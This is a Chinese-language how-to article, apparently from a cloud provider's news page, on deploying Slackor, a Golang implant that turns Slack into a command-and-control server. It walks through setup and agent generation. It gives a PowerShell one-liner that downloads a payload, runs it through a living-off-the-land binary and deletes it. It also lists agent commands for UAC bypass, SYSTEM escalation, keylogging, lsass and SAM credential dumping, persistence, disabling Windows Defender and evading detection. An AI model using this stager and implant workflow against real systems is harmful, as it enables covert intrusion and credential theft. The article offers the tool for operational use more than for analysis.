您好,登錄后才能下訂單哦!
如何將Slack當作你的命令控制服務器,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
Slackor是一款Golang植入,它可以將Slack作為你的命令控制服務器。
注意:該工具目前僅處于概念驗證模型階段,請在創建任何Slack應用之前,確保應用符合Slack App開發者政策。
Slackor服務器端采用Python 3開發,在使用該工具之前,你需要滿足以下條件:
1、 一個Slack工作區;
2、 以下列權限注冊一個App:
channels:readchannels:historychannels:writefiles:write:userfiles:read
3、 創建一個BOT;
Slackor項目中包含五個文件:
1、install.sh:安裝依賴組件2、setup.py:這個腳本可以創建Slack信道、數據庫和植入程序3、agent.py:這個腳本可以生成新的植入程序4、server.py:Slack服務器,可在Linux平臺上運行5、agent.go:Golang植入程序6、requirements.txt:Python依賴(自動安裝)
go get github.com/Coalfire-Research/Slackorcd $GOPATH/src/github.com/Coalfire-Research/Slackor
運行了上述命令之后,運行“install.sh”文件,然后運行“setup.py”,此時需要你提供Slack應用程序的“OAuth訪問令牌”以及 “Bot User OAuth訪問令牌”。
成功運行上述腳本之后,還需要在項目的dist/目錄中創建下列幾個文件:
agent.windows.exe:Windows 64-bit 代碼agent.upx.exe:Windows 64-bit 代碼, UPX 封裝agent.darwin:macOS 64-bit 代碼agent.32.linux:Linux 32-bit 代碼agent.64.linux:Linux 64-bit 代碼
在Linux主機上運行server.py之后,工具會根據目標主機的情況自動選擇上述代理程序。
我們可以使用“stager”模塊來生成一個one-liner或其他Dropper:
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /msvchost.exe /c C:\Users\Public\[NAME]; timeout 2; delC:\Users\Public\[NAME].exe
這條命令將會執行InvokeWebRequest(PS v.3+)來下載Payload,并使用一個LOLBin來執行它。執行完成后,Payload會進行自毀操作。這只是一個僅供參考的使用樣例,大家可以根據自己的需要來使用其他的下載方法或執行方法。
輸入“help”或按下TAB鍵,我們就可以查看到該工具所支持的全部可用命令了,我們還可以輸入“help [COMMAND]”來查看命令描述。
(Slackor:服務器端)help –顯示幫助菜單interact– 與代理端交互list –列出所有已注冊的代理remove– 終止或移除代理revive– 向所有的代理發送重新注冊信號stager– 生成一個One-Liner下載并執行植入程序quit –退出程序wipefiles– 刪除Slack中的所有上傳文件
當代理端就緒之后,我們就可以跟它進行交互了。使用“interact [AGENT]”可以切換到代理端的命令行界面,然后輸入“help”或按下TAB鍵即可查看代理端支持的所有可用命令。
(Slackor:代理端)
back –返回主菜單beacon– 修改代理確認時間間隔(默認為5秒)download– 從代理端下載文件至Slackor服務器help –顯示幫助菜單kill –終止代理sleep– 代理休眠sysinfo– 顯示當前用戶、操作系統版本、系統架構和CPU核心數upload– 從代理端上傳一份文件至Slackor 服務器wget –通過HTTP/HTTPS獲取任意文件Windows命令bypassuac– 生成一個高完整性的代理cleanup– 移除持久性組件clipboard– 獲取剪切板內容defanger– 嘗試關閉WindowsDefenderduplicate– 生成代理端副本getsystem-使用NTAUTHORITY/SYSTEM權限生成代理keyscan– 在代理端開啟鍵盤記錄器minidump–導出lsass.exe內存信息并下載persist– 在ADS中創建持久性植入程序samdump– 嘗試導出SAM文件,以供離線提取哈希特征screenshot– 獲取屏幕截圖shellcode– 執行x64元ShellcodeLinux命令screenshot- 獲取屏幕截圖
命令輸出和下載的文件都采用了AES加密,額外的還有Slack的TLS傳輸層加密。
在執行需要向磁盤寫入數據的任務時,模塊會給用戶發送提醒。在執行Shell命令時,cmd.exe/bash將會被執行,這種行為可能會被目標主機監控到。下面給出的是一些OPSEC安全命令,它們不會執行cmd.exe/bash。
cat –打印文件內容cd – 修改目錄find –搜索目錄文件名getip– 獲取外部IP地址(發送一個DNS 請求)hostname– 顯示主機名稱ifconfig– 顯示接口信息ls – 列舉目錄內容mkdir– 創建一個目錄pwd –輸出當前工作目錄rm – 移除一個文件rmdir– 移除一個目錄whoami/ getuid – 輸出當前用戶信息
看完上述內容,你們掌握如何將Slack當作你的命令控制服務器的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。